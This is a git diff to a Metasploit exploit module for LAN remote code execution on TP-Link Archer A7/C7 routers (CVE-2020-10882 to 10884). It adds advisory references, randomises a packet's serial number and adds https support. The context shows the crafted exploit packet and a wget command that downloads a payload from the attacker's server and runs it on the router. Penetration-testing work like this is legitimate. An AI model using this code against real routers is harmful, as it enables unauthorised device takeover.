diff --git a/modules/exploits/linux/misc/tplink_archer_a7_c7_lan_rce.rb b/modules/exploits/linux/misc/tplink_archer_a7_c7_lan_rce.rb index 107649da7a..d0e01d04be 100644 --- a/modules/exploits/linux/misc/tplink_archer_a7_c7_lan_rce.rb +++ b/modules/exploits/linux/misc/tplink_archer_a7_c7_lan_rce.rb @@ -3,9 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -# PR: TODO run metasploit-framework/tools/dev/msftidy.rb tplink_archerc7_lan_rce.rb -# PR: to see and fix the stuff they don't like - require 'openssl' class MetasploitModule < Msf::Exploit::Remote @@ -38,7 +35,8 @@ class MetasploitModule < Msf::Exploit::Remote ], 'References' => [ - [ 'URL', ''], + [ 'URL', 'https://www.thezdi.com/blog/2020/4/6/exploiting-the-tp-link-archer-c7-at-pwn2own-tokyo'], + [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/Pwn2Own/Tokyo_2019/lao_bomb.md'], [ 'CVE', '2020-10882'], [ 'CVE', '2020-10883'], [ 'CVE', '2020-10884'], @@ -337,8 +335,7 @@ class MetasploitModule < Msf::Exploit::Remote [0x00].pack('S>*') + # packet len [0x01].pack('C*') + # some flag, has to be 1 to enter the vulnerable onemesh function [0x00].pack('C*') + # dunno what this is - [0xCA,0xFE,0xBA,0xBE].pack('C*') + # serial number, can by any value - # PR : we should randomise it then! TODO later once it's working + [rand(0xff),rand(0xff),rand(0xff),rand(0xff)].pack('C*') + # serial number, can by any value [0x5A,0x6B,0x7C,0x8D].pack('C*') # Checksum placeholder srv_host = datastore['SRVHOST'] @@ -360,6 +357,9 @@ class MetasploitModule < Msf::Exploit::Remote # Command that will download @payload_exe and execute it download_cmd = "wget http://#{srv_host}:#{srv_port}/#{@cmd_file};chmod +x #{@cmd_file};./#{@cmd_file}" + if datastore['SSL'] + download_cmd = download_cmd.sub("http", "https") + end http_service = (datastore['SSL'] ? 'https://' : 'http://') + srv_host + ':' + srv_port.to_s print_status("Starting up our web service on #{http_service} ...")